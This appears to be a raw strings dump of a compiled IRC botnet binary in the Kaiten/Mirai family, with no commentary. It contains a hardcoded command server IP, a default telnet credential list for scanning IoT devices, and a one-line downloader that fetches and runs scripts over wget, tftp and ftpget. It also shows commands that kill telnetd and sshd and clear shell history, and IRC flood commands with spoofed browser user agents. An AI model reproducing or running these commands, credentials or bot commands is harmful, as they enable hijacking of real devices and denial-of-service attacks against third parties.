PTRh
)9S_
<suM
<duJ
<xuJ
<XuJ
<uuG
<cuT
gfff
[^_]
;E }
\[^_]
<[^_]
< t(
P^_]
<:uu
PRQW
T$(S
T$(S
UWVS
^8QShO
D$(P
D$(P
[^_]
t$(j
UWVS
[^_]
UWVS
<rt><w
t7<af
E4tmPh8
t$(V
[^_]
UWVS
[^_]
QPRS
^8PShO
t$,V
t$$S
[^_]
UWVS
T$`~
L$,1
D$(%
WVPR
$VRP
?0u,
D$ P
PRQQ
[^_]
tR~P
tB~@=
UWVS
<$u0
\$L9
~	<mtN
:*u4
L$pE
D$`P
T$\)
\[^_]
^8QShO
D$ P
Z %0
D$ P
^8PShO
[^_]
UWVS
[^_]
AIt	
UWVS
[^_]
UWVS
D$gP
[^_]
UWVS
Z[^_]
\$HPh
D$)P
RVShZ~
D$ P
D$$Ph
UWVS
t$xSU
t$xj
t$hW
\$DS
T$@XZ
D$TPh
E$RWP
uZRj
t$,U
L[^_]
D$ Pj
D$ Pj
UWVS
\$ThP
D$8P
T$ ~
#t$ 
2#D$ 
D$8P
[^_]
[^_]
UWVS
u=9J
;X,tQ
[^_]
UWVS
u<9J
SSPQ)
[^_]
uXRh
\$ S
D$,Ph
UWVS
[^_]
UWVS
G;<$|
XZKy
[^_]
UWVS
[^_]
D$ [Xj
}/QQ
uJQQj
t$@h(
D$4j
ET$,
UWVS
 <xu
(<`v
}/C9
D$, D$
t$$h@
u%WWSS
ZYSS
[^_]
yPPj
PPSh
UWVS
D$ P
t@;D$xu
D$ P
t$Dj
D$<PR
t$(j
UWVS
[^_]
UWVS
)\$(
[^_]
UWVS
wcQWUR
[^_]
[^_]
UWVS
[^_]
UWVS
u'z%
u?z=
D$Pp
l$61
D$(RP
D$'g
D$'f
\$'t
D$\p
|$d|4
|$'ftt
T$H~@
[^_]
QQWS
'RRWS
UWVS
.u5A
Z[^_]
UWVS
D$7h(
T$8XZj
\$PS
D$$;
}3Ph
t$(j
D$$f
D$LPU
D$89
uOQhh
XZKj
9\$$}
PCPVU
;\$d|
D$tP
T$|RW
G$;G wn
9D$xu,
t$4C;\$h}
T$<^_
uDQhh
XZKj
9\$$}
D$(@
T$(u
tMQh(
T$8f
[^_]
UWVS
t>QQh
\$$S
[^_]
t$4j
t$8j
xAPPSh 
UWVS
T$$v
^8PShO
D$(PV
x:RW
D$(PV
[^_]
PVWS
t+F1
D$ PU
[^_]
UWVS
D$(P
yQGQVh
u+Rj
D$$P
,[^_]
UWV1
D$+1
|<+0u&
D<+t)
|$7W
<[^_]
UWVS
Pj j
D$HP
;D$|v
!WWR
[^_]
UWVS
[^_]
UWVS
D$0t 
PPj#
u,PP
t$4U
[^_]
UWVS1
YRRj.W
D$()
[^_]
UWVS
G;|$,
s^PS
[^_]
5.152.211.70
telnet
root
supervisor
support
admin
antslq
vertex25ektks123
zyad1234
vnpt
1234567890
BusyBox
ogin
sername
assword
nvalid
ailed
ncorrect
enied
rror
oodbye
busybox
armv6
armv4
mips
mipsel
cock
fucknet
swatnet
botnet
dicknet
cracknet
weednet
ballnet
queernet
unet
yougay
gaynet
armv5l
armv6l
tftp
buff
i686
mips64
jackmeoff
sexy
briankrebs
sparc
powerpc-440fp
cunt*
shit
mirai.
mirai
Merkuryntpd
mirai.mips
kill -9 $(pidof %s);
kill -9 $(pidof busybox
kill -9 $(pidof telnetd
kill -9 $(pidof sshd
history -c
kill -9 %s
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.152.211.70/Cheats.sh; chmod 777 Cheats.sh; sh Cheats.sh; tftp 5.152.211.70 -c get tftp11.sh; chmod 777 tftp11.sh; sh tftp11.sh; tftp -r tftp22.sh -g 5.152.211.70; chmod 777 tftp22.sh; sh tftp22.sh; ftpget -v -u anonymous -p anonymous -P 21 5.152.211.70 ftp11.sh ftp11.sh; sh ftp11.sh; rm -rf Che -rf *
export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;export HOME=/tmp;[ ! -f /var/bin/Cheats ] && cd /var/bin;(killall -9 telnetd || kill -9 telnetd) && (nohup Cheats || trap '' 1 2 /var/bin/Cheats)
export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;export HOME=/tmp;[ ! -f /var/bin/Cheats ] && cd /var/bin;(killall -9 sshd || kill -9 sshd) && (nohup Cheats || trap '' 1 2 /var/bin/Cheats)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02
Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)
Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)
Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4
Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1
Void
(null)
NOTICE %s :Unable to resolve %s
NOTICE %s :Unable to comply.
/usr/dict/words
%s : USERID : UNIX : %s
:>%$#
%d.%d.%d.%d
NOTICE %s :>bot +std <target> <port> <secs>
NOTICE %s :[STD]Hitting %s!
NOTICE %s :[STD]Done hitting %s!
NOTICE %s :Killing pid %d.
gethostbyname
NOTICE %s :>bot +http <target> <secs> <GET/HEAD/POST>
Tacocat
%s resolved to %s
GET / HTTP/1.1
Host: %s
Accept: */*
Content-Type: text/html
Content-Length: 0
User-Agent: %s
POST
POST / HTTP/1.1
Host: %s
Accept: */*
Content-Type: text/html
Content-Length: 0
User-Agent: %s
PUT / HTTP/1.1
Host: %s
Accept: */*
Content-Type: text/html
Content-Length: 0
User-Agent: %s
NOTICE %s :[HTTP] Attacking %s!
NOTICE %s :Starting Scanner.
ogin:
assword:
NOTICE %s :Login found 0.0.0.0:%s:%s
NOTICE %s :Login found %:%s:%s
NOTICE %s :>bot +unknown <target> <port> <secs>
NOTICE %s :[UNK]Hitting %s!
NOTICE %s :[UNK]Done hitting %s!
NOTICE %s :Nice try...
+std
+stop
+unknown
+scanner
+SCAN ON
+SCAN OFF
+KILL
+http
+GikbsyigbIGY
MODE %s +pixB
JOIN %s :%s
WHO %s
PONG %s
NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
[Ktn-Remastered]
NOTICE
PING
8.8.8.8
/proc/net/route
	00000000	
/usr/bin/python
sshd
/usr/sbin/dropbear
Kaiten
Modified Kaiten
#boatreps
PASS %s
NICK %s
USER %s localhost localhost :%s
ERROR
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Beeb
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
Host name lookup failure
Unknown server error
No address associated with name
Resolver error
/bin/sh
/dev/null
L(knN
 Ainf
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
CAk[S
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
Eleele
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
Degas are we not drawn onward no In union drawn onward to new eras aged
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
Do nine men interpret Nine men I nod
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2429
p.2427
__do_global_dtors_aux
object.2482
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
ktnremasterd.c
C.0.4270
printchar
prints
i.4508
printi
print
textBuffer.4747
i.4759
ipState
get_random_ip
__syscall_fcntl.c
__syscall_fcntl64.c
_exit.c
access.c
close.c
fork.c
getdtablesize.c
getpid.c
getppid.c
getrlimit.c
ioctl.c
kill.c
open.c
prctl.c
read.c
select.c
time.c
waitpid.c
write.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
__errno_location.c
fclose.c
fopen.c
printf.c
vsprintf.c
sprintf.c
vsnprintf.c
_fopen.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.4160
_fixed_buffers
_wcommit.c
vfprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4370
prefix.4371
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4372
qual_chars.4377
spec_chars.4373
spec_ranges.4374
spec_or_mask.4375
spec_and_mask.4376
fgets.c
fflush_unlocked.c
fgets_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strcat.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1330
_string_syserrmsgs.c
bcopy.c
strcasecmp.c
strcasestr.c
strtok.c
next_start.1278
isatty.c
tcgetattr.c
ntohl.c
herror.c
error_msg
h_errlist
colon_space.2931
inet_ntoa.c
buf.2827
inet_makeaddr.c
gethostbyname.c
buf.5162
h.5161
gethostbyname_r.c
accept.c
bind.c
connect.c
getsockname.c
getsockopt.c
listen.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
malloc.c
__malloc_largebin_index
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
sysconf.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.3001
sigaction.c
__restore_rt
__restore
libc/sysdeps/linux/i386/vfork.S
libc/sysdeps/linux/i386/mmap.S
__socketcall.c
__syscall_rt_sigaction.c
clock_getres.c
execve.c
getegid.c
geteuid.c
getgid.c
getpagesize.c
getuid.c
munmap.c
nanosleep.c
sbrk.c
sigprocmask.c
wait4.c
__C_ctype_tolower.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
fprintf.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
fgetc_unlocked.c
memchr.c
memmove.c
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
raise.c
signal.c
sigsetops.c
dl-support.c
brk.c
__syscall_error.c
poll.c
fseeko.c
fseeko64.c
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
strcmp.c
strncat.c
rawmemchr.c
strspn.c
strdup.c
ntop.c
inet_pton4
xdigits.3285
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
llseek.c
tolower.c
strchr.c
encoded.c
decoded.c
lengthd.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
SnoopDogg
__GI_execve
unknown
__libc_sigaction
strcpy
__GI_fcntl64
__socketcall
__GI___ctype_b
__GI_memchr
__GI___glibc_strerror_r
waitpid
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
_352
getgid
sysconf
printf
stdout
vsprintf
random
__GI_strdup
__GI_getpagesize
getdtablesize
__GI_h_errno
contains_fail
Send
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__GI_tolower
recv
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
__pthread_mutex_lock
adminuser1
__sigdelset
identd
__GI_clock_getres
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
memmove
__bsd_signal
__GI_strpbrk
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
Borrow or rob
__GI_fclose
__GI_wcsnrtombs
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getRandomPublicIP
getc_unlocked
ident
servers
__ctype_b
__GI_random_r
usernames
errno
getegid
read_until_response
__GI_sbrk
__libc_accept
__GI___uClibc_init
pass
nick
execve
getpagesize
getpid
killsec
__GI_lseek64
setstate_r
fgets
__libc_getpid
__xpg_strerror_r
fcntl64
mfork
prctl
memcpy
getRandomIP
__GI_fputs_unlocked
execl
__GI_fgets
creat
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
sock
trim
__GI_fgets_unlocked
__pthread_mutex_init
tolower
getuid
system
__open_etc_hosts
malloc
A Santa lives evil at NASA
isatty
sleep
__GI_atol
vsnprintf
__dns_lookup
__GI_read
__C_ctype_tolower
random_r
__dso_handle
clock_getres
gethostbyname_r
socket
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
__GI_accept
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
_string_syserrmsgs
disabled
God A red nugget A fat egg under a dog
__GI_herror
__GI_open
__GI_strchr
__searchdomain
__GI_tcgetattr
__environ
mmap
wcsnrtombs
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
scanneron
srandom_r
_init
__GI_inet_ntoa_r
hostname_to_ip
__GI_setstate_r
strtol
__libc_lseek64
strnlen
rawmemchr
__GI_mempcpy
accept
__malloc_state
user
__GI___C_ctype_b_data
_NOTICE
scanneroff
__sigaddset
nanosleep
__GI_send
h_errno
server
__pthread_mutex_unlock
wait4
__register_frame_info_bases
__GI_exit
__app_fini
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
spoofs
environ
__GI_close
fprintf
udpTry
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
strcat
__GI_brk
__GI_strcat
bind
__GI_nanosleep
_376
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
ourIP
fseeko
_stdio_openlist_del_count
makestring
__raise
setsockopt
spoofsm
bsd_signal
fseek
__GI_kill
__GI_strcmp
__GI_memmove
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
strcasestr
_start
__deregister_frame_info_bases
strstr
__GI_ioctl
rand
signal
read
__decode_header
__GI___h_errno_location
__GI_memcpy
strcoll
wcsrtombs
_stdio_user_locking
filter
strncpy
strcasecmp
htonl
sendto
__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
__GI_gethostbyname_r
__GI_strncpy
__libc_send
__GI___xpg_strerror_r
prefix
__GI___C_ctype_tolower
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
listen
__stdio_adjust_position
malloc_trim
__GI_poll
_vfprintf_internal
__GI_strcasestr
fork
__stdio_rfill
strncat
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
__GI_munmap
_store_inttype
__length_dotted
__getpagesize
__GI_random
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
index
_pthread_cleanup_push_defer
__sigismember
fopen
__bss_start
__libc_open
getOurIP
get_telstate_host
memset
__GI_socket
main
__glibc_strerror_r
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
srand
initstate
fclose
__syscall_rt_sigaction
ntohs
inet_ntoa
getppid
tcgetattr
__C_ctype_tolower_data
time
__libc_system
__GI_abort
poll
host2ip
__GI_fprintf
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
botkiller
herror
strcmp
advances2
__nameserver
data_start
__GI_sysconf
__h_errno_location
matchPrompt
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
_fini
__vfork
__GI_mmap
contains_success
sprintf
fdgets
__get_pc_thunk_bx
strerror_r
__GI_select
__libc_waitpid
__GI_waitpid
_stdio_term
__GI_vfprintf
__decode_answer
__GI_signal
numservers
stderr
fails
vfork
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
__GI_printf
__libc_fork
changeservers
__atexit_lock
scanPid
rand_cmwc
advances
__libc_fcntl64
getsockopt
__GI_fseeko64
hstrerror
fflush_unlocked
__stdio_wcommit
contains_string
__GI___fgetc_unlocked
strwildmatch
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
access
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
alula
__GI_strstr
__searchdomains
_end
__GI_listen
htons
_sigintr
chan
_ppfs_prepargs
msgs
__GI_strspn
fgetc_unlocked
initstate_r
sendhttp
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
inet_ntop
__C_ctype_toupper_data
